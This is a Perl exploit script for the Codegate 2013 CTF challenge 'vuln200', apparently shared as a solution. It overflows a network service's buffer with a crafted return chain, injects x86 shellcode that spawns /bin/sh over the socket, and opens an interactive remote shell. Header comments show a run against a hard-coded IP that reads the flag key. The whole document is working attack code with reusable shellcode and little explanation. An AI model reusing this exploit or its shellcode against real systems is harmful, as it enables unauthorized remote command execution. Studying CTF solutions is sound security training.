Rating:
#!/usr/bin/perl
# codegate2013 vuln200 exploit
# cutz
#
# perl expl_vuln200.pl 58.229.122.19 7777
# [x] exploit successfull
# $ id
# uid=1001(codegate2013) gid=1001(codegate2013) groups=1001(codegate2013)
# $ ls
# dump.txt
# key
# logs
# pwn2
# $ cat key
# Key is "This_is_C0G6ESTYL3!_:)"
use strict;
use warnings;
use IO::Socket;
$|++;
my $ip = shift;
my $port = shift;
my $sock;
my $buf;
$sock = new IO::Socket::INET (
PeerAddr => $ip,
PeerPort => $port,
Proto => 'tcp',
) or die "Conn failed", $/;
sysread $sock, $buf, 1024, 0;
my $payload =
"write" .
"A"x240 .
pack("I", 0x08048780) .
pack("I", 0x0804c000) .
pack("I", 0x00000004) .
pack("I", 0x0804c000) .
pack("I", 0x00000100) .
pack("I", 0x00000000);
print $sock $payload;
select undef, undef, undef, 0.101;
print $sock
"\x31\xc9\x6a\x3f\x58\x6a\x04\x5b\xcd\x80" .
"\x41\x83\xf9\x03\x75\xf2\x6a\x0b\x58\x99" .
"\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" .
"\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";
sysread $sock, $buf, 1024, 0;
print $sock "echo EXPLOITED", $/;
sysread $sock, $buf, 1024, 0;
sysread $sock, $buf, 1024, 0;
if ($buf =~ /^EXPLOITED/) {
print "[x] exploit successfull", $/;
} else {
print "[x] failed", $/;
close $sock;
exit;
}
my $cmd;
while (1) {
print "\$ ";
$cmd = <>;
print $sock $cmd;
sysread $sock, $buf, 1024, 0;
print $buf;
}
close $sock;
